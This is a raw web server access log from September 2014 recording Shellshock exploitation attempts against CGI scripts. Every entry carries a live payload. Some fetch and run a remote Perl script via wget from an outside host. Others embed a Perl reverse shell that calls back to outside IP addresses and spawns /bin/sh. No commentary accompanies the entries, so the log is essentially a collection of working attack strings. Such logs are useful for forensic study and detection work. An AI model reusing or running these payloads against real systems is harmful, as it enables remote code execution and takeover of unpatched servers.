177.154.48.54 - - [26/Sep/2014:16:50:30 -0400] "GET /cgi-bin/uptime.cgi HTTP/1.1" 200 72
"-" "() { :; }; /usr/bin/wget http://mobi.ma.cx/b -O /tmp/bbr;/usr/bin/perl /tmp/bbr"
177.154.48.54 - - [26/Sep/2014:16:50:31 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "()
{ :; }; /usr/bin/wget http://mobi.ma.cx/b -O /tmp/bbr;/usr/bin/perl /tmp/bbr"
177.154.48.54 - - [26/Sep/2014:16:50:31 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "()
{ :; }; /usr/bin/wget http://mobi.ma.cx/b -O /tmp/bbr;/usr/bin/perl /tmp/bbr"
74.208.126.144 - - [26/Sep/2014:16:51:27 -0400] "GET /cgi-bin/uptime.cgi HTTP/1.0" 200 72
"-" "() { :;}; /bin/bash -c \"/usr/bin/wget mobi.ma.cx/b -O /tmp/bbr;/bin/chmod 777
/tmp/bbr;/usr/bin/perl /tmp/bbr\""
74.208.126.144 - - [26/Sep/2014:16:51:28 -0400] "GET /cgi-bin/uptime.cgi HTTP/1.0" 200 72
"-" "() { :;}; /bin/bash -c \"/usr/bin/wget mobi.ma.cx/b -O /tmp/bbr;/bin/chmod 777
/tmp/bbr;/usr/bin/perl /tmp/bbr\""
177.154.48.54 - - [26/Sep/2014:16:52:21 -0400] "GET /cgi-bin/uptime.cgi HTTP/1.1" 200 72
"-" "() { :; }; /usr/bin/wget http://mobi.ma.cx/b -O /tmp/bbr;/usr/bin/perl /tmp/bbr"
177.154.48.54 - - [26/Sep/2014:17:17:26 -0400] "GET /cgi-bin/uptime.cgi HTTP/1.1" 200 72
"-" "() { :; }; /usr/bin/wget http://mobi.ma.cx/b -O /tmp/bbr;/usr/bin/perl /tmp/bbr"
212.2.227.4 - - [27/Sep/2014:16:48:47 -0400] "GET /cgi-bin/uptime.cgi HTTP/1.1" 200 72 "()
{ :; }; /bin/bash -c \"perl -e '\\$p=fork;exit,if(\\$p); use Socket; use FileHandle; my
\\$system = \\\"/bin/sh\\\"; my \\$host = \\\"212.2.227.4\\\"; my \\$port =
\\\"31337\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\"));
connect(SOCKET, sockaddr_in(\\$port, inet_aton(\\$host))); SOCKET->autoflush();
open(STDIN, \\\">&SOCKET\\\"); open(STDOUT,\\\">&SOCKET\\\");
open(STDERR,\\\">&SOCKET\\\"); print \\\"[+] Et voila you are in!\\\\n\\\\n\\\";
system(\\\"uname -a;id\\\"); system(\\$system);'\"" "Mozilla/5.0 (Windows NT 6.3; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
212.2.227.4 - - [27/Sep/2014:16:50:47 -0400] "GET /cgi-bin/sensors.cgi HTTP/1.1" 200 1027
"() { :; }; /bin/bash -c \"perl -e '\\$p=fork;exit,if(\\$p); use Socket; use FileHandle;
my \\$system = \\\"/bin/sh\\\"; my \\$host = \\\"212.2.227.4\\\"; my \\$port =
\\\"31337\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\"));
connect(SOCKET, sockaddr_in(\\$port, inet_aton(\\$host))); SOCKET->autoflush();
open(STDIN, \\\">&SOCKET\\\"); open(STDOUT,\\\">&SOCKET\\\");
open(STDERR,\\\">&SOCKET\\\"); print \\\"[+] Et voila you are in!\\\\n\\\\n\\\";
system(\\\"uname -a;id\\\"); system(\\$system);'\"" "Mozilla/5.0 (X11; Linux x86_64)
AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
212.2.227.4 - - [27/Sep/2014:16:55:13 -0400] "GET /cgi-bin/sensors.cgi HTTP/1.1" 200 1027
"() { :; }; /bin/bash -c \"perl -e '\\$p=fork;exit,if(\\$p); use Socket; use FileHandle;
my \\$system = \\\"/bin/sh\\\"; my \\$host = \\\"212.2.227.4\\\"; my \\$port =
\\\"31337\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\"));
connect(SOCKET, sockaddr_in(\\$port, inet_aton(\\$host))); SOCKET->autoflush();
open(STDIN, \\\">&SOCKET\\\"); open(STDOUT,\\\">&SOCKET\\\");
open(STDERR,\\\">&SOCKET\\\"); print \\\"[+] Et voila you are in!\\\\n\\\\n\\\";
system(\\\"uname -a;id\\\"); system(\\$system);'\"" "Mozilla/5.0 (Windows NT 5.1; rv:31.0)
Gecko/20100101 Firefox/31.0"
178.79.162.227 - - [28/Sep/2014:03:57:41 -0400] "GET /cgi-bin/uptime.cgi HTTP/1.1" 200 72
"() { :; }; /bin/bash -c \"perl -e '\\$p=fork;exit,if(\\$p); use Socket; use FileHandle;
my \\$system = \\\"/bin/sh\\\"; my \\$host = \\\"212.2.227.4\\\"; my \\$port =
\\\"1313\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\"));
connect(SOCKET, sockaddr_in(\\$port, inet_aton(\\$host))); SOCKET->autoflush();
open(STDIN, \\\">&SOCKET\\\"); open(STDOUT,\\\">&SOCKET\\\");
open(STDERR,\\\">&SOCKET\\\"); print \\\"[+] Et voila you are in!\\\\n\\\\n\\\";
system(\\\"uname -a;id\\\"); system(\\$system);'\"" "Mozilla/5.0 (Windows NT 6.3; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
178.79.162.227 - - [28/Sep/2014:04:42:15 -0400] "GET /cgi-bin/uptime.cgi HTTP/1.1" 200 72
"() { :; }; /bin/bash -c \"perl -e '\\$p=fork;exit,if(\\$p); use Socket; use FileHandle;
my \\$system = \\\"/bin/sh\\\"; my \\$host = \\\"212.2.227.4\\\"; my \\$port =
\\\"8080\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\"));
connect(SOCKET, sockaddr_in(\\$port, inet_aton(\\$host))); SOCKET->autoflush();
open(STDIN, \\\">&SOCKET\\\"); open(STDOUT,\\\">&SOCKET\\\");
open(STDERR,\\\">&SOCKET\\\"); print \\\"[+] Et voila you are in!\\\\n\\\\n\\\";
system(\\\"uname -a;id\\\"); system(\\$system);'\"" "Mozilla/5.0 (compatible; MSIE 10.0;
Windows NT 6.1; WOW64; Trident/6.0)"
178.79.162.227 - - [28/Sep/2014:04:50:49 -0400] "GET /cgi-bin/uptime.cgi HTTP/1.1" 200 72
"() { :; }; /bin/bash -c \"perl -e '\\$p=fork;exit,if(\\$p); use Socket; use FileHandle;
my \\$system = \\\"/bin/sh\\\"; my \\$host = \\\"69.175.123.147\\\"; my \\$port =
\\\"8080\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\"));
connect(SOCKET, sockaddr_in(\\$port, inet_aton(\\$host))); SOCKET->autoflush();
open(STDIN, \\\">&SOCKET\\\"); open(STDOUT,\\\">&SOCKET\\\");
open(STDERR,\\\">&SOCKET\\\"); print \\\"[+] Et voila you are in!\\\\n\\\\n\\\";
system(\\\"uname -a;id\\\"); system(\\$system);'\"" "Mozilla/5.0 (Windows NT 6.3; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36